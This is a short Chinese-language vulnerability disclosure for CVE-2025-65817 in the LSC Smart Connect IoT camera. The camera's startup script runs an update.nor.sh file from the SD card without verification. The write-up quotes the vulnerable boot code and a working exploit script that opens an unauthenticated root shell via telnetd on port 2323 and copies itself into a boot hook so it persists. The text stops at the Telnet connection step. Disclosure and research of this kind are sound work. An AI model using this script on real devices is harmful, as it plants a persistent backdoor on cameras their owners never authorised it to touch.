
Here is the CVE-2025-65817
| 字段 | 值 |
|---|---|
| 标题 | 漏洞报告:LSC Smart Connect 摄像头 |
| 日期 | 2024-02-15 |
| 描述 | 滥用 SD 卡更新钩子,在 LSC Smart Connect 摄像头上生成远程 shell。 |
| 标签 | iot, vulnerability, cve |
| 固件版本 | 1.14.13 |
发现的漏洞在于利用 start_app.sh 中的更新系统,更具体地说是通过 SD 卡挂载和 update.nor.sh 文件。
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"
local/sbin/start_app.sh:50–99 部分盲目信任 SD 卡上名为 update.nor.sh 的任何文件。在启动过程中,该脚本:
update.nor.sh 复制到 /tmp/update.nor.sh,随后在启动序列中(local/sbin/start_app.sh:108–129),复制后的文件:
该执行发生在 主 ipc_service 启动之前,意味着脚本在 最高权限环境 中运行,此时网络工具、看门狗功能和升级辅助工具均已可用。
该漏洞利用是通过创建 shell 并开放 telnetd 端口(摄像头自带)实现的:
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]
只需将一个 .sh 脚本写入 SD 卡并命名为 update.nor.sh 即可。
我选择的利用脚本为:
#!/bin/sh
telnetd -l /bin/sh -p 2323 &
echo "Telnet start by update.nor.sh" > /tmp/exploit_success
cp /mnt/update.nor.sh /mnt/config/hook-boot.sh
date > /tmp/exploit_time
我们确认端口已开放。

通过 Telnet 连接:
